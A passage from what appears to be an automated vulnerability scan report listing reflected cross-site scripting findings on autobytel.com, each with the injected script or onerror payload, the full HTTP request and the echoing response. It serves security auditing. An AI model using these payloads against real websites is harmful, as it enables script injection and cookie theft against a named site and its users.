Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:40:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:40:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:40:48 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54715

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/terms?c24ec"><script>alert(1)</script>ea08fbb8c3=1">
...[SNIP]...

4.494. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79131"><script>alert(1)</script>c16027f265e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/?79131"><script>alert(1)</script>c16027f265e=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:35:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:35:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:35:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:35:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75109

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/?79131"><script>alert(1)</script>c16027f265e=1">
...[SNIP]...

4.495. http://www.autobytel.com/content/research/article/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e083"><script>alert(1)</script>3970073240c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/article/index.cfm?9e083"><script>alert(1)</script>3970073240c=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:22 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:22 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/article/index.cfm?9e083"><script>alert(1)</script>3970073240c=1">
...[SNIP]...

4.496. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d69"><script>alert(1)</script>361724af196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show?47d69"><script>alert(1)</script>361724af196=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/article/index.cfm/filters/Auto Show?47d69"><script>alert(1)</script>361724af196=1">
...[SNIP]...

4.497. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a483e"><script>alert(1)</script>844843e9554 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide?a483e"><script>alert(1)</script>844843e9554=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 45634
Expires: Mon, 24 Jan 2011 23:37:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:00 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:59 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:59 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/article/index.cfm/filters/Buying Guide?a483e"><script>alert(1)</script>844843e9554=1">
...[SNIP]...

4.498. http://www.autobytel.com/content/research/comparison/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 851b3"><script>alert(1)</script>1b23e4debab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/comparison/index.cfm?851b3"><script>alert(1)</script>1b23e4debab=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/comparison/index.cfm?851b3"><script>alert(1)</script>1b23e4debab=1">
...[SNIP]...

4.499. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e80"><script>alert(1)</script>9fb9c2eb029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI?f5e80"><script>alert(1)</script>9fb9c2eb029=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:15 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI?f5e80"><script>alert(1)</script>9fb9c2eb029=1">
...[SNIP]...

4.500. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ccd"><script>alert(1)</script>16170de7a7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1?f4ccd"><script>alert(1)</script>16170de7a7b=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

4.501. http://www.autobytel.com/content/shared/modProfile/index.cfm [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/shared/modProfile/index.cfm

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 1d65d<img%20src%3da%20onerror%3dalert(1)>413a205e61a was submitted in the action parameter. This input was echoed as 1d65d<img src=a onerror=alert(1)>413a205e61a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /content/shared/modProfile/index.cfm?id=4;ABTL&action=handler1d65d<img%20src%3da%20onerror%3dalert(1)>413a205e61a HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 10174
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:44:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:04 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:04 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:44:04 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/

<html>
<head>
<title>Signup</title>
<link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>

</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABL
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Could not find the included template act_handler1d65d<img src=a onerror=alert(1)>413a205e61a.cfm.
</h1>
...[SNIP]...

4.502. http://www.autobytel.com/coupons/my-garage.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/coupons/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d81a"><script>alert(1)</script>f5d32ebedf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupons/my-garage.htm?7d81a"><script>alert(1)</script>f5d32ebedf5=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:59 GMT
Content-Length: 22155
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/coupons/my-garage.htm?7d81a"><script>alert(1)</script>f5d32ebedf5=1">
...[SNIP]...

4.503. http://www.autobytel.com/diagnose-problem/my-garage.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/diagnose-problem/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bf5"><script>alert(1)</script>ab4ad55d4a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /diagnose-problem/my-garage.htm?45bf5"><script>alert(1)</script>ab4ad55d4a5=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:43 GMT
Content-Length: 22199
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/diagnose-problem/my-garage.htm?45bf5"><script>alert(1)</script>ab4ad55d4a5=1">
...[SNIP]...

4.504. http://www.autobytel.com/my-garage.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b79c"><script>alert(1)</script>b4f72701277 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-garage.htm?6b79c"><script>alert(1)</script>b4f72701277=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:04 GMT
Content-Length: 22077
Connection: close
